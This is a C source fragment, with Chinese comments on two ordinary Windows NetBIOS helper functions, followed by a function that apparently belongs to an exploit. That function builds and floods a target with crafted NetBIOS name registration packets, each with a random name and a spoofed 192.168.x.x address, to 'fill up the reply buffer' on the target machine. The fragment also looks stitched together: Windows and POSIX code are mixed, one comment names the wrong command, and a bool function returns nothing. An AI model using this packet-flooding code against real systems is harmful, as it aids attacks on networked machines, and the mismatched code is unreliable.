// 向本地名字表中添加名字
BOOL NBAddName (int nLana, LPCSTR szName)
{
NCB ncb;
memset (&ncb, 0, sizeof (ncb)); // 清空ncb结构体
ncb.ncb_command = NCBADDNAME; // 执行NCBDDNAME命令,向本地名字表中添加一个唯一的名字
ncb.ncb_lana_num = nLana; // 设置lana_num资源,指定本地网络名字编号。
MakeNetbiosName ((char*) ncb.ncb_name, szName); // 将szName赋值到ncb.ncb_name中
Netbios (&ncb); // 执行NCBRESET命令
NBCheck (ncb); // 如果执行结果不正确,则输出ncb.ncb_retcode
// 如果成功返回TRUE,否则返回FALSE
return (NRC_GOODRET == ncb.ncb_retcode);
}
// 获取指定LANA的网络适配器信息
// nLana, LANA编号
// pBuffer, 获取到的网络适配器缓冲区
// cbBuffer, 缓冲区长度
// szName, 主机名字
BOOL NBAdapterStatus (int nLana, PVOID pBuffer, int cbBuffer, LPCSTR szName)
{
NCB ncb;
memset (&ncb, 0, sizeof (ncb)); // 清空ncb结构体
ncb.ncb_command = NCBASTAT; // 设置执行NCBASTAT命令,获取本地或远程网络适配器的状态
ncb.ncb_lana_num = nLana; // 设置LANA编号
ncb.ncb_buffer = (PUCHAR) pBuffer; // 将获取到的数据保存到参数pBuffer中
ncb.ncb_length = cbBuffer; // 设置缓冲区长度
MakeNetbiosName ((char*) ncb.ncb_callname, szName);// 设置参数ncb.ncb_callname
Netbios (&ncb); // 执行NetBIOS命令
NBCheck (ncb); // 如果执行不成功,则输出返回值
// 如果成功返回TRUE,否则返回FALSE
return (NRC_GOODRET == ncb.ncb_retcode);
}
//------------------------------------------------------------------------------------------------
bool FillTargetList(int nSd, unsigned int nPacketCount)
{
// this is the original packet
const unsigned char * sPacket = "\x00\x00" //ID
"\x79\x00" //FLAGS
"\x00\x01" //QUERIES
"\x00\x00" //ANSWERS
"\x00\x00" //AUTHORITHY RRS
"\x00\x01" //ADDITIONAL RRS
"\x20" // host start
//!invalid host name (32 bytes from offset 0Dh - 2Dh)
"\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41" // netbios host name
"\x42\x4C" // host type
"\x00" // end
"\x00\x20"//TYPE NB
"\x00\x01"//CLASS IN
//Additional RRS
"\xc0\x0c"
"\x00\x20"//TYPE NB
"\x00\x01"//CLASS IN
"\x00\x00\x00\x78" //TTL
"\x00\x06" // DATA Length
"\x40\x00" // NB FLAGS
"\xC8\xA8\x00\x00" // NB ADDRESS 192.168.x.x
; //Total length 68 bytes
// In order to fill up the reply buffer we need 96 netbios names with <1b> address on target machine
unsigned char szWorkerPacket[68];
int i = 0;
unsigned char nIpNet = 0, nIpHost = 0;
unsigned short nIdBase = rand();
char szName[16], szNbName[31];
szNbName[30] = 0x0; // just for printing purposes set term byte to 0x00
printf("[*] Sending %u packets, sleeping 3 seconds after 32 packets sent\n", nPacketCount);
printf("-> ");
fflush(stdout);
for(i = 0; i < nPacketCount; i++)
{
// copy packet template
memcpy(szWorkerPacket, sPacket, 68);
// insert 2 byte id at offset 00h
memcpy(szWorkerPacket, &nIdBase, 2);
nIdBase++;
// gen rand name
GenRandName(szName);
// tanslate into netbios format
MakeNetbiosName(szName, szNbName);
// insert name into the packet at offset 0D
memcpy(szWorkerPacket + 0x0D, szNbName, 0x1E);
// insert IP network part at offset 42h
nIpNet = i / 255;
memcpy(szWorkerPacket + 0x42, &nIpNet, 0x01);
// insert IP host part at offset 43h, use value of i
nIpHost = i % 255;
memcpy(szWorkerPacket + 0x43, &nIpHost, 0x01);
// increment id
nIdBase++;
//!Packet ready, lets send
write(nSd, szWorkerPacket, 68);
if((i + 1) % 32 == 0)
{
printf(".");
fflush(stdout);
}
}
printf("\n[*] Done, sent %u packets\n", nPacketCount);
fflush(stdout);
}
